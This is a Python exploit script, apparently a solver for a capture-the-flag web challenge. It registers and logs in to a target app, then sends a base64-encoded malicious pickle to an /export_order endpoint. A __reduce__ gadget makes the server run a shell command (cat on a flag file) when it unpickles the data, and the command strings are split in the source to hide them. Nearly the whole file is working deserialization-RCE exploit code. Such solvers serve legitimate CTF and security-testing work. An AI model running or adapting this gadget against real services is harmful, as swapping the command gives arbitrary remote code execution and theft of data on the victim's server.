#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re, sys, requests, pickle, base64, subprocess, json, hashlib

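# Target host/port and the flag this run is expected to recover, from argv.
# Fail with a usage line instead of the bare ValueError a short argv gives.
if len(sys.argv) < 4:
    sys.exit(f"usage: {sys.argv[0]} HOST PORT FLAG")
HOST, PORT, FLAG = sys.argv[1:4]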

class RCE:
    """Pickle gadget: unpickling an instance runs ``cat /tmp/secure_flag.txt``.

    ``__reduce__`` tells pickle to rebuild the object by calling
    ``subprocess.check_output`` with the argument list below, so the command
    executes on whichever host loads the payload and its stdout becomes the
    "reconstructed" object.
    """

    def __reduce__(self):
        """Return the callable and argument tuple pickle replays on load."""
        # The program name and path are assembled from fragments so the
        # literal strings do not appear in this source file. They are joined
        # here, before pickling, so the serialized stream still carries the
        # full command and path: this does not evade a filter that inspects
        # the pickle bytes on the target.
        program = "".join(("ca", "t"))
        target_file = "".join(("/tmp", "/secure_flag.txt"))
        argv = [program, target_file]
        return subprocess.check_output, (argv,)

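def generate_legacy_payload(protocol=None):
    """Build the base64-encoded pickle the target is expected to unpickle.

    The order dict is a plausible-looking "legacy" record whose ``user`` field
    is an ``RCE`` instance, so the pickle stream carries a
    ``subprocess.check_output`` call that runs when the target loads it.

    Args:
        protocol: Pickle protocol to emit. ``None`` keeps the interpreter's
            default (the previous behavior). Pin a lower value (e.g. ``2``) if
            the target runs an older Python: a stream using a protocol newer
            than the target's ``pickle`` supports fails to load instead of
            executing the gadget.

    Returns:
        The pickled order as a base64 ``str`` suitable for a query parameter.
    """
    malicious_order = {
        'amount': '100',
        'user': RCE(),
        'description': 'Legacy order format test',
    }
    # NOTE: never pickle.loads this locally to "check" it — doing so executes
    # the embedded command on this machine.
    payload = pickle.dumps(malicious_order, protocol=protocol)
    return base64.b64encode(payload).decode()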

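def exp(ip, port, *, timeout=10):
    """Register, log in and trigger the pickle deserialization via /export_order.

    The malicious ``order_id`` is sent as a query parameter. If the target
    unpickles it, the ``RCE`` gadget runs on the server; whether the captured
    command output then appears in the HTTP body depends on how the endpoint
    renders the order, so a ``None`` result does not prove the gadget failed.

    Args:
        ip: Target host name or address.
        port: Target TCP port; the target is contacted over plain HTTP.
        timeout: Per-request timeout in seconds, so a stalled target cannot
            hang the exploit indefinitely.

    Returns:
        The full ``DASCTF{...}`` flag string if one is present in the
        response body, otherwise ``None`` (after printing a preview).
    """
    url = f"http://{ip}:{port}"
    creds = {"username": "exploit", "password": "exploit"}

    with requests.Session() as s:
        # Registration is best-effort (the account may exist from an earlier
        # run); the login that follows is what establishes the session cookie.
        s.post(f"{url}/register", data=creds, timeout=timeout)
        s.post(f"{url}/login", data=creds, timeout=timeout)

        malicious_order_id = generate_legacy_payload()

        # Passing the payload via params= lets requests URL-encode it, so the
        # '+', '/' and '=' characters of the base64 text survive the trip.
        response = s.get(
            f"{url}/export_order",
            params={"order_id": malicious_order_id},
            timeout=timeout,
        )

        flag_match = re.findall(r'DASCTF\{(.*?)\}', response.text)
        if flag_match:
            return f"DASCTF{{{flag_match[0]}}}"

        # No flag in the body: show its start to help diagnose what came back.
        print("Response preview:", response.text[:200])
        return None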

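if __name__ == '__main__':
    result = exp(HOST, PORT)
    print(f"Extracted flag: {result}")
    print(f"Expected flag: {FLAG}")
    # Explicit comparison rather than `assert`: assertions are stripped under
    # `python -O`, which would turn a failed exploit into a printed "Pass!".
    if result != FLAG:
        sys.exit("FAIL: extracted flag does not match the expected flag")
    print("Pass!")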